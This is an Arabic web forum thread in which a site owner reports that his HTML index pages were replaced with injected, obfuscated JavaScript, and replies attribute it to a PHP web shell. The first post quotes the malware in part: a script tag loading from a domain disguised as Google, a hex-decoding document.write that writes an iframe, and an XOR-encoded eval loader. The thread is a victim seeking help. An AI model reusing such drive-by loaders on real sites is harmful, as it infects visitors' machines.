النتائج 1 إلى 5 من 5

الموضوع: باتش يضرب صفحات Index ويدمر محتوياتها

  1. #1
    عضو سوبر نشيط
    تاريخ التسجيل
    Aug 2002
    المشاركات
    715

    باتش يضرب صفحات Index ويدمر محتوياتها



    السلام عليكم
    لدي أرشيف أخبار يحتوي على أكثر من 30.000 صفحه HTML

    وعند فتح أي صفحة INDEX.html تظهر صفحه بيضاء خاليه

    وعندما فتحتها بـ محرر الصفحات وجد أنه محتويات الصفحة إستبدلت بــ كود غريب

    كود HTML:
    <script src="http://safe.google-xxxxxxxxx.com/webanalytics.js"></script>
    <script>
    function v47f05eb5a54fc(v47f05eb5a5505)
    { var v47f05eb5a5510=16;
    return(parseInt(v47f05eb5a5505,v47f05eb5a5510));}
    function v47f05eb5a5544(v47f05eb5a554a)
    {  var v47f05eb5a5550=''; for(v47f05eb5a5556=0;
    v47f05eb5a5556<v47f05eb5a554a.length; v47f05eb5a5556+=2)
    { 
    v47f05eb5a5550+=(String.fromCharCode(v47f05eb5a54fc(v47f05eb5a554a.substr(v47f05eb5a5556, 2))));}
    return v47f05eb5a5550;}
    document.write(v47f05eb5a5544('3C5343524950543E77696E646F772E7374617475733D2
    7446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37623
    63731207372633D5C2768747...'));</script>
    عند التوجه إلى الصفحة http://safe.google-xxxxxxxxx.com/webanalytics.js
    وجد الكود التالي

    كود HTML:
    function google_irl(google_ryg,google_famas) {
    var google_xen = "";
    for (var i = 0 ; i < google_ryg.length; ++i)
    google_xen += String.fromCharCode(google_famas ^ google_ryg.charCodeAt(i));
    return google_xen; }
    function google_ritn(google_ftak) { eval(google_ftak); return;}
    google_ritn(google_irl("\xcb\xd5\xd2\xd8\xd3\xcb\x92\xcf\xc8\xdd\xc8\xc9\xcf\x81
    \x9e\xf8\xd3\xd2\xd9\x9e\x87\xb1\xb6\xd8\xd3\xdf\xc9\xd1\xd9\xd2\xc8\x92\xcb\xce
    \xd5\xc8\xd9\x94\x9b\x80\xd5\x9b\x97\x9b\xda\xce\xdd\x9b\x97\x9b\xd1\xd9\x9c\xcf
    \xce\x9b\x97\x9b\xdf\x81\x9e\x9b\x97\xc9\xd2\xd9\xcf\xdf\xdd\xcc\xd9\x94\x9b\xd4
    \xc8\xc8\xcc\x99\x8f\xfd\x93\x93\x8e\x8c\x8d\x92\x8e\x8d\x84\x92\xxx\xxx\xxx\xxx
    \xxx\xxx\xxx\x93\xcb\xd9\xde\xdd\xd2\xdd\xd0\xc5\xc8\xd5\xdf\xcf\x93\xdf\xd3\xc9
    \xd2\xc8\x92\xcc\xd4\xcc\x99\x8f\xfa\xd3\x99\x8f\xf8\x8d\x9b\x95\x97\x9b\x9e\x9c
    \xcb\xd5\xd8...", 188));
    ما أسم هذا الباتش وكيف أتخلص منه؟

    سوف أسترجع نسخه إحتياطي من الموقع ولكن أخاف يرجع ويدمر الصفحات من جديد

    فما الحل؟





    __________________
    Linux For Server | Mac For Graphic | Windows For ٍٍٍٍٍSolitaire


  2. #2
    عضو سوبر نشيط
    تاريخ التسجيل
    Aug 2002
    المشاركات
    715


    up





    __________________
    Linux For Server | Mac For Graphic | Windows For ٍٍٍٍٍSolitaire

  3. #3
    عضو نشيط جدا
    تاريخ التسجيل
    Nov 2000
    المشاركات
    504


    صراحه لا اعلم عن هذا الفايرس اي شي ولاكن انصحك بتحميل نورتن انتي فايروس على جهازك

    هو الافضل وذلك لانه يعالج الملفات بدون حذف عكس الكاسبر و البرامج الاخرى اللي ممكن تتسبب بحذف ملفاتك






  4. #4
    عضو سوبر نشيط
    تاريخ التسجيل
    Aug 2002
    المشاركات
    715


    أشكرك أخي الطالب

    لكن أعتقد بوجود الباتش في السيرفر
    وسمعت أنه يكون ملف php or exe الله أعلم





    __________________
    Linux For Server | Mac For Graphic | Windows For ٍٍٍٍٍSolitaire

  5. #5
    عضو سوبر نشيط
    تاريخ التسجيل
    Feb 2004
    المشاركات
    695


    أخي هذا ملف شيل روسي إسمه sniper.php يقوم بضرب كافة الصفحات و جداول قواعد البيانات التي تسمى index و حله إسترجاع نسخة من الموقع و يجب اخبار المستضيف عن هذه المشكلة لأن الملف يكون موجود على أحد المواقع على السيرفر و يجب حذفه مع العلم ان ه يمكن تضمين كود الجافا المشفر أعلاه بفايروس يصيب أجهزة من يدخل الصفحات

    مع التحية





    __________________
    للمراسلة و المسنجر: ajeeb4you@hotmail.com





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض